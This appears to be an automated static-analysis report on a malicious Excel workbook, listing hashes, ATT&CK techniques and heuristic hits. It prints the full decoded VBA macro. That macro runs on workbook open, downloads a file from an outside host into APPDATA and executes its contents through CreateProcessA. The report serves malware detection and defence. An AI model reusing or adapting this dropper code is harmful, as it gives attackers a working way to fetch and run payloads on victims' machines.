Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 54fce640058356f0…

MALICIOUS

Office (OLE)

52.0 KB Created: 2018-10-09 07:18:04 Authoring application: Microsoft Excel First seen: 2021-01-11
MD5: c43446df960d9776d84e7b65d4c0c178 SHA-1: 0b8eabdc73da6eea3afdf06aa3660292f342febf SHA-256: 54fce640058356f035c786f869a86b0ebceaf9c510457de95fdf0a23afc44a7f
258 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer

The sample is an Excel document containing VBA macros. A critical heuristic indicates the use of URLDownloadToFile within VBA, and the script itself contains API calls for CreateProcessA and URLDownloadToFile. This strongly suggests the macro's purpose is to download and execute a second-stage payload from the embedded URL http://kredytinksao.pl/raw.txt.

Heuristics 8

  • ClamAV: Xls.Dropper.Agent-7592644-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Dropper.Agent-7592644-0
  • Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOAD
    Reference to URLDownloadToFile API
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD
    URLDownloadToFile in VBA
    Matched line in script
    Private Declare PtrSafe Function URLDownloadToFileA Lib "urlmon" _
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Sub Workbook_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
        Ret3 = Environ$("APPDATA") + "\pay1.ps1"
  • Reference to CreateProcess API high SC_STR_CREATEPROCESS
    Reference to CreateProcess API
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://kredytinksao.pl/raw.txt Referenced by macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4347 bytes
SHA-256: 0a76635d9e9c190852b60a09ee16303ffa0f9e73d53eafe1772387962048cd0e
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Ten_skoroszyt"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Arkusz1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
'asdf
Private Type STARTUPINFO
    cb As Long
    lpReserved As Long
    lpDesktop As Long
    lpTitle As Long
    dwX As Long
    dwY As Long
    dwXSize As Long
    dwYSize As Long
    dwXCountChars As Long
    dwYCountChars As Long
    dwFillAttribute As Long
    dwFlags As Long
    wShowWindow As Integer
    cbReserved2 As Integer
    lpReserved2 As Long
    hStdInput As Long
    hStdOutput As Long
    hStdError As Long
End Type
'asdf
Private Type PROCESS_INFORMATION
    hProcess As Long
    hThread As Long
    dwProcessId As Long
    dwThreadId As Long
End Type
'asdf
Private Type SECURITY_ATTRIBUTES
    nLength As Long
    lpSecurityDescriptor As Long
    bInheritHandle As Long
End Type
'asdf
'aa
'll
Private Type OVERLAPPED
        Internal As Long
        InternalHigh As Long
        offset As Long
        OffsetHigh As Long
        hEvent As Long
End Type
'lkl
'jkjkj
Private Declare PtrSafe Function DeleteFileA Lib "kernel32.dll" _
(ByVal lpFileName As String) As Long

Private Declare PtrSafe Function CreateProcessA Lib "kernel32.dll" _
    (ByVal lpApplicationName As String, _
    ByVal lpCommandLine As String, _
    ByVal lpProcessAttributes As Long, _
    ByVal lpThreadAttributes As Long, _
    ByVal bInheritHandles As Boolean, _
    ByVal dwCreationFlags As Long, _
    ByVal lpEnvironment As Long, _
    ByVal lpCurrentDirectory As String, _
    ByRef lpStartupInfo As STARTUPINFO, _
    ByRef lpProcessInformation As PROCESS_INFORMATION) As Long

Private Declare PtrSafe Function URLDownloadToFileA Lib "urlmon" _
    (ByVal pCaller As Long, _
    ByVal szUrl As String, _
    ByVal szFileName As String, _
    ByVal dwReserved As Long, _
    ByVal lpfnCB As Long) As Long
Private Declare PtrSafe Function CreateFileA Lib "kernel32" _
    (ByVal lpFileName As String, _
    ByVal dwDesiredAccess As Long, _
    ByVal dwShareMode As Long, _
    lpSecurityAttributes As SECURITY_ATTRIBUTES, _
    ByVal dwCreationDisposition As Long, _
    ByVal dwFlagsAndAttributes As Long, _
    ByVal hTemplateFile As Long) As Long
'hhh
''
Private Declare PtrSafe Function ReadFile Lib "kernel32" _
    (ByVal hFile As Long, _
    ByVal lpBuffer As String, _
    ByVal nNumberOfBytesToRead As Long, _
    lpNumberOfBytesRead As Long, _
    lpOverlapped As OVERLAPPED) As Long
    
Private Declare PtrSafe Function SetFilePointer Lib "kernel32" _
    (ByVal hFile As Long, _
    ByVal lDistanceToMove As Long, _
    ByVal lpDistanceToMoveHigh As Long, _
    ByVal dwMoveMethod As Long) As Long

Private Declare PtrSafe Function CloseHandle Lib "kernel32" _
(ByVal hObject As Long) As Long

Private Const GENERIC_READ = &H80000000
Private Const OPEN_EXISTING = &H3&
Private Const FILE_ATTRIBUTE_NORMAL = &H80&

Sub Workbook_Open()
    Dim si As STARTUPINFO
    Dim pi As PROCESS_INFORMATION
    si.cb = Len(si)
    Dim Ret As Long
    '
    Dim Ret2 As Long
    Dim Ret3 As String
    '
    Dim Ret4 As Integer
    Dim Ret6 As Long
    '
    Dim Ret8 As Long
    Dim Ret7 As Long
    '
    Dim Ret9 As String * 4096
    Dim Ret10 As Long
    Dim sa As SECURITY_ATTRIBUTES
    Dim ov As OVERLAPPED
    ov.hEvent = &H0
    Ret3 = Environ$("APPDATA") + "\pay1.ps1"
    Ret2 = URLDownloadToFileA(0, "http://kredytinksao.pl/raw.txt", Ret3, 0, 0)
    sa.nLength = Len(sa)
    'fghjfghjfghj
    'fgjf
    Ret7 = CreateFileA(Ret3, 1, 2, sa, 3, 0, 0)
    Result = SetFilePointer(Ret7, 10, 0, 0)
    Result = ReadFile(Ret7, Ret9, 4096, Ret6, ov)
    Ret10 = CloseHandle(Ret7)
    Ret = CreateProcessA(vbNullString, Ret9, ByVal 0&, ByVal 0&, True, 32, ByVal 0&, vbNullString, si, pi)
End Sub